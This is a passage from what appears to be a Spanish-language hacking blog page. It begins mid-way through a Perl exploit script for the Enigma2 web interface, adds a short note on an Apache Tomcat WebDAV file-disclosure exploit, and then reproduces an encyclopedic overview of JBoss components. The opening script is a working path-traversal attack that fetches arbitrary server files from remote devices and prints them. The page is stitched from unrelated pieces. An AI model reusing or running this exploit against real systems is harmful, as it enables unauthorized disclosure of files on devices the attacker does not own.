if ($r =~ (m/1.6.0|1.6.1|1.6.2|1.6.3|1.6.4|1.6.5|1.6.6|1.6.7|1.6.8|1.6rc3|1.7.0/i)){
print "[+] Exploiting Enigma2 via type1 (file?file=$d)\n";
result(exploit1());
}
if ($r =~ (m/1.5rc1|1.5beta4/i)){
print "[+] Exploiting Enigma2 via type2 (file/?file=../../../..$d)\n";
result(exploit2());
}
sub usg{
print "\n[+] Enigma2 Webinterface 1.7.x 1.6.x 1.5.x remote exploit\n";
print "[+] Usage: perl enigma2.pl \n";
exit;
}
sub exploit1{
my $x = get("http://$t/file?file=$d");
}
sub exploit2{
my $x = get("http://$t/file/?file=../../../..$d");
}
sub result{
my $x= shift;
while(defined $x){
print "$x\n";
print "[+] I got it 4 cheap.. =)\n";
exit;
}}

Apache Tomcat File Disclosure (Exploit)

A vulnerability in Apache Tomcat allows remote attackers to disclose the content of files stored on the remote server by exploiting a vulnerability in the way the WebDAV LOCK function handles requests.

Check that http://www.securiteam.com/exploits/6S00D1FK0K.html

JBoss

JBOSS

JBoss es un servidor de aplicaciones J2EE de código abierto implementado en Java puro. Al estar basado en Java, JBoss puede ser utilizado en cualquier sistema operativo para el que esté disponible Java. Los principales desarrolladores trabajan para una empresa de servicios, JBoss Inc., adquirida por Red Hat en abril del 2006, fundada por Marc Fleury, el creador de la primera versión de JBoss. El proyecto está apoyado por una red mundial de colaboradores. Los ingresos de la empresa están basados en un modelo de negocio de servicios.

JBoss implementa todo el paquete de servicios de J2EE.

Servidor de aplicaciones JBoss

JBoss AS es el primer servidor de aplicaciones de código abierto, preparado para la producción y certificado J2EE 1.4, disponible en el mercado, ofreciendo una plataforma de alto rendimiento para aplicaciones de e-business. Combinando una arquitectura orientada a servicios revolucionaria con una licencia de código abierto, JBoss AS puede ser descargado, utilizado, incrustado y distribuido sin restricciones por la licencia. Por este motivo es la plataforma más popular de middleware para desarrolladores, vendedores independientes de software y, también, para grandes empresas.

Las características destacadas de JBoss incluyen :

Producto de licencia de código abierto sin coste adicional.
Cumple los estándares.
Confiable a nivel de empresa
Incrustable, orientado a arquitectura de servicios.
Flexibilidad consistente
Servicios del middleware para cualquier objeto de Java
Ayuda profesional 24x7 de la fuente
Soporte completo para JMX

EJB 3.0

Implementa la especificación inicial de EJB 3.0.

JBoss AOP

JBoss AOP está orientado a trabajar con Programación Orientada a Aspectos. Esto permitirá añadir fácilmente servicios empresariales (transacciones, seguridad, persistencia) a clases Java simples.

Hibernate

Hibernate es un servicio de persistencia objeto/relaciones y consultas para Java. Hibernate facilita a los desarrolladores crear las clases de persistencia utilizando el lenguaje Java - incluyendo la asociación, herencia, polimorfismo y composición y el entorno de colecciones Java.

JBoss Cache

JBoss Cache es un producto diseñado para almacenar en caché los objetos Java más frecuentemente accedidos de manera que aumente de forma notable el rendimiento de aplicaciones e-bussines. Eliminando accesos innecesarios a la base de datos, JBoss Cache reduce el tráfico de red e incrementa la escalabilidad de las aplicaciones.

JBoss Cache proporciona dos APIs de caché que se ajustan a nuestras necesidades. La API de JBossCache ofrece una caché tradicional basada en nodos y estructurada en árbol, y la API JBossCacheAOP, edificada sobre la API de JBossCache, proporciona capacidad para la replicación de objetos Java de grano fino, con el máximo beneficio del rendimiento.


JBoss IDE

Brinda una IDE Eclipse para el JBoss AS. De esta forma la depuración y otras tareas asociadas al desarrollo de aplicaciones puede ser realizadas desde el entorno de Eclipse.

JBoss jBPM

Gestor de procesos de negocio, también denominado "WorkFlow".

jBPM es una plataforma para lenguajes de procesos ejecutables, cubriendo desde gestión de procesos de negocio (BPM) bajo workflow hasta orquestación de servicios. Actualmente jBPM soporta tres lenguajes de procesos, cada uno enfocado a un ambiente y funcionalidad especifica:

jPDL
BPEL
Pageflow

jBPM soporta a estos lenguajes de procesos sobre una sola tecnología: Máquina Virtual de Procesos(PVM)

JBoss Portal

Es una plataforma de código abierto para albergar y servir una interfaz de portales Web, publicando y gestionando el contenido así como adaptando el aspecto de la presentación.

Como características principales categorizadas cabe destacar:

Tecnología y arquitectura

JEMS: hace uso del potencial de JBoss Enterprise Middleware Services : JBoss Application Server, * JBoss Cache, Jgroups e Hibernate.
DB Agnóstico: funciona con cualquier SGBD soportado por Hibernate
SSO/LDAP: hace uso de las soluciones de single sign on (SSO) de Tomcat y JBoss
Autenticación JAAS: módulos de autenticación adaptables vía JAAS
Caché: utiliza cacheado en la capa de visualización para mejor rendimiento
Clusterizable: soporte de Cluster que permite que un portal pueda ser desplegado en varias instancias
Hot-Deployment: hace uso de las características de autodespliegue dinámico incluido en JBoss
Instalador SAR: instalación basada en web que hace que la instalación y configuración inicial sea muy sencilla.

Estándares soportados

Portlet Specification and API 1.0 (JSR-168)
Content Repository for Java Technology API (JSR-170)
Java Server Faces 1.2 (JSR-252)
Java Management Extensión (JMX) 1.2
Compatibilidad 100% con J2EE 1.4 al utilizar JBoss AS

Contenedor de Portales

Múltiples Instancias de Portales: habilidad para ejecutar múltiples portales desplegados en un único contenedor.
IPC (Inter-Portlet Communication): la API habilita a los portlets crear enlaces a otros objetos como páginas, portales o ventanas.
Dynamicity: permite a administradores y usuarios crear y eliminar objetos como portlets, páginas, portales, temas y composición en tiempo de ejecución.
Internacionalización: permite utilizar recursos de internacionalización para cada portlet.
Servicios empotrables: la autenticación realizada por el contenedor de servlets y JAAS posibilita cambiar el esquema de autenticación.
Arquitectura basada en Páginas: permite for the grouping/division of portlets on a per-page basis.
Soporte de Frameworks existentes: los Portlets pueden utilizar Struts, Spring MVC, Sun JSF-RI, AJAX o MyFaces.

Temas y Layouts

Temas y Layouts fácilmente intercambiables: los temas y layouts nuevos que contienen imágenes se pueden desplegar en ficheros WAR.
API Flexible: la API de Temas y Layout están diseñados para separar la lógica de negocio de la capa de presentación.
Estrategia de layout por página: a cada página se le puede asignar layouts distintos.

Funcionalidades de Usuarios y Grupos

Registro y validación de usuarios: parámetros configurables del registro permite la validación de usuarios vía email previa a la activación.
Acceso de usuarios: hace uso de la autenticación del contenedor de servlets.
Crear/Modificar usuarios: habilita a los administradores crear/modificar perfiles de usuarios.
Crear/Modificar roles: habilita a los administradores crear/modificar roles.
Asignación de roles: habilita a los administradores asignar roles a los usuarios.

Gestión de Permisos

API extensible de permisos: permite asignar permisos de acceso a portlets basados en la definición de roles.
Interfaz de administración: asignación de permisos a roles en cualquier momento para portlets, páginas o instancias de portal desplegados.

Sistema de gestión de contenidos

Compatible JCR: el CMS utiliza Apache Jackrabbit, una implementación en código abierto del estándar Java Content Repository API.
Soporte de almacenamiento en SGBD o en el sistema de ficheros.
Soporte externo de contenidos tipo Blob (binarios): se puede configurar el almacenamiento en el sistema de ficheros de contenido binario de gran tamaño y los nodos con las referencias y propiedades residan en el SGBD.
Control de versiones: Todo contenido modificado/creado es autoversionado con el historial de cambios, que pueden ser revisados en cualquier momento.
Contenidos mostrados en URLs amigables para los motores de búsqueda: http://yourdomain/portal/content/index.html (sin incluir las acciones de los portlets)
URLs del portal sencillas: mostrar descarga de binarios con URLs fáciles de recordar. (http://domain/files/products.pdf)
Soporte de múltiples instancias de Portlets HTML: permite que instancias extra de contenido estático del CMS sean publicadas en ventanas distintas.
Soporte de directorios: crear, mover, eliminar, copiar y subir árboles completos de directorios.
Funciones de Ficheros: crear, mover, copiar, cargar y eliminar ficheros.
Explorador de directorios embebido: cuando se copia, mueve, elimina o se crean nuevos ficheros, los administradores pueden simplemente navegar por el árbol de directorios hasta encontrar la colección en la que se realizará la acción.
Arquitectura fácil de usar: todas las acciones que se pueden realizar sobre ficheros pueden hacerse a base de clicks de ratón.
Editor HTML: con modo WYSIWYG, previsualización y edición de código HTML. Soporta la creación de tablas, fuentes, zoom, enlaces a imágenes y URLs, soporte de películas flash, listas con viñetas o numéricas...
Soporte de editor de estilos: el editor WYSIWYG muestra la hoja de estilo actual del Portal, para un sencillo intercambio de clases.
Soporte de Internacionalización: los contenidos pueden ser asignados para una zona regional determinada y ser mostrada en función de la configuración de usuario o basado en las opciones del navegador web .

Tablón de mensajes

Respuesta inmediate mediante un sólo click.
Respuesta con cita: se puede citar un tema existente al responder.
Control del flujo: previene el abuso de envío masivo de mensajes mediante una ventana de tiempo configurable.
Creación de categorías contenedoras de foros.
Operaciones sobre Foros: se puede crear un foro y asignarlo a una categoría específica, además se puede copiar, mover, modificar y eliminar.
Reordenación de foros y categorías: se puede establecer el orden en el que se quiere que aparezcan los foros y categorías en las páginas.

Tomcat

Tomcat es un contenedor de servlets utilizado como la implementación de referencia oficial para las tecnologías de JavaServer Pages y Java Servlet. Las especificaciones de estas tecnologías las desarrolla Sun bajo el proceso de Comunidad Java.

JBoss Mail Server

Es el servidor de correo para la arquitectura de JBoss; se utiliza principalmente con JEMS.

JBoss MQ

Para la mensajería en JMS

JBoss Messaging

JBoss Messaging provee un servicio de mensajería robusto y de alto rendimiento, soporta esquemas de integración que van desde simples mecanismos entre aplicaciones hasta grandes Arquitecturas de Servicios (SOA) y Canales de Servicios Empresariales (ESB).

JBoss Forum (JForum)

Es el paquete dedicado especialmente a los foros como su nombre indica. Es un foro de discusión en Java similar en prestaciones y aspecto a phpBB. Tiene licencia BSD, soporte para bases de datos MySQL, PostgreSQL y HSQLDB, una interfaz altamente configurable, soporte para un número ilimitado de grupos de usuarios con permisos distintos, notificaciones por correo electrónico de actividad en los posts, soporte para internacionalización, etc.

Las novedades incluyen soporte RSS para foros, hilos y mensajes individuales, caché configurable, soporte para HSQLDB, mejoras de rendimiento y estabilidad, internacionalización configurable en cada usuario, instalación gráfica por medio de una interfaz web, los hilos más visitados, más opciones de administración relacionadas con la seguridad y los permisos de uso y muchas cosas más.

Fuente: http://es.wikipedia.org/wiki/JBoss

Comunidad: http://community.jboss.org/
Se produjo un error en este gadget.

Etiquetas

INTERNET (457) newsweek (305) SEGURIDAD (225) software (136) HACK (86) Hacker (46) GOOGLE (44) Geek (41) hardware (36) WINDOWS (34) Hackers (31) CRACK (29) video (28) DESCARGA (27) facebook (27) videos (26) Celulares (25) MICROSOFT (22) Informatica (21) apple (19) GRATIS (18) technology (18) virus (18) exploit (17) computación (16) informatico (16) web (15) cracker (14) INALAMBRICO (13) WINDOWS 7 (13) noticias (11) MSN (10) termino (10) ACTUALIZACION (9) Gamer (9) LapTops (9) Mac (9) PASSWORD (9) WINDOWS XP (9) dns (9) firefox (9) juegos (9) FOTOS (8) cientifico (8) iphone (8) WEP (7) antivirus (7) bibliografia (7) Desencriptar (6) INFINITUM (6) wifi (6) youtube (6) Craker (5) Culiacan (5) DESMOSTRACION (5) TELEFONIA (5) messenger (5) DIRECTA (4) DOWNLOAD (4) ESPAÑOL (4) XBOX (4) gmail (4) xss (4) Glosario (3) HTML (3) WPA (3) anuncios (3) hosting (3) hotmail (3) Guru (2) ajax (2) ataques (2) wpa2 (2)